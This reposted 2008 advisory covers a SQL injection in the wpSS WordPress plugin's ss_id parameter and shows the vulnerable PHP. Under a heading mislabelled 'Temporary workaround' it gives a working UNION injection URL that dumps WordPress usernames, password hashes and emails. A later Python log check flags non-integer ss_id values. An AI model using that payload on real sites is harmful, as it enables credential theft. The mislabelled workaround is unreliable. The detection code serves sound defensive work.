WordPress wpSS Plugin ss_id Parameter SQL Injection Vulnerability

Posted by ArtHack on May 2nd, 2008 and filed under Notice loopholes.

Affected systems:
WordPress wpSS <= 0.6 v
Unaffected systems:
WordPress wpSS 0.62
Description:
——————————————————————————–
BUGTRAQ ID: 28894

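wpSS is a spreadsheet plugin for WordPress that allows interactive spreadsheets to be embedded in WordPress blogs.

The wpSS/ss_load.php file of the wpSS plugin does not properly filter the ss_id parameter before using it in an SQL query: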

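ss_load.php:
// ss_id is read from the query string without any validation
$id = $_GET['ss_id'];
....
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
....
// $id is interpolated directly into the SQL string
if ($wpdb->query("SELECT * FROM $table_name WHERE id='$id'") == 0) {
....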

This allows a remote attacker to manipulate the SQL query by injecting arbitrary SQL code, resulting in arbitrary code execution.

<*Source: 1ten0.0net1

Link: http://secunia.com/advisories/29938/
*>

Recommendations:
——————————————————————————–
Temporary workaround:

http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+ct+1,concat(user_login,0×3a,user_pass,0×3a,user_email),3,4++wp_users–&display=plain

Vendor patch:
———
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:

http://timrohrer.com/blog/?page_id=71
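
A log check for the ss_load.php endpoint described above, added here as an example (it is not part of the original advisory or of the plugin): it flags requests whose ss_id is not a plain decimal integer. The combined access-log format, the assumption that legitimate spreadsheet ids are integers, and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Access-log prefix: client, ident, user, [timestamp], "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
ENDPOINT = "/wpss/ss_load.php"  # compared case-insensitively against the URL path

def suspicious_ss_id(log_lines):
    """Return (client_ip, decoded ss_id) for wpSS requests with a non-integer ss_id.

    Assumption: legitimate spreadsheet ids are short decimal integers.
    """
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        client, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith(ENDPOINT):
            continue  # some other script; ss_id there is not our concern
        # parse_qs percent-decodes and maps '+' to a space, normalising encodings
        for value in parse_qs(parts.query, keep_blank_values=True).get("ss_id", []):
            if not re.fullmatch(r"\d{1,10}", value):
                hits.append((client, value))
    return hits

# Constructed sample lines (not taken from any real server log).
SAMPLE_LOG = [
    '203.0.113.5 - - [02/May/2008:10:00:01 +0000] '
    '"GET /wp-content/plugins/wpSS/ss_load.php?ss_id=3&display=plain HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/May/2008:10:00:09 +0000] '
    '"GET /wp-content/plugins/wpSS/ss_load.php?ss_id=1%27 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [02/May/2008:10:00:12 +0000] '
    '"GET /wp-content/plugins/wpSS/ss_load.php?display=plain&ss_id=2+and+(1=0) HTTP/1.1" 200 2048',
    '203.0.113.5 - - [02/May/2008:10:00:20 +0000] '
    '"GET /index.php?ss_id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, value in suspicious_ss_id(SAMPLE_LOG):
        print(f"{client}\tss_id={value!r}")
```

A hit only shows that the endpoint received a non-numeric value; on a site still running wpSS 0.6 or earlier it is a reason to upgrade and review the affected accounts.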
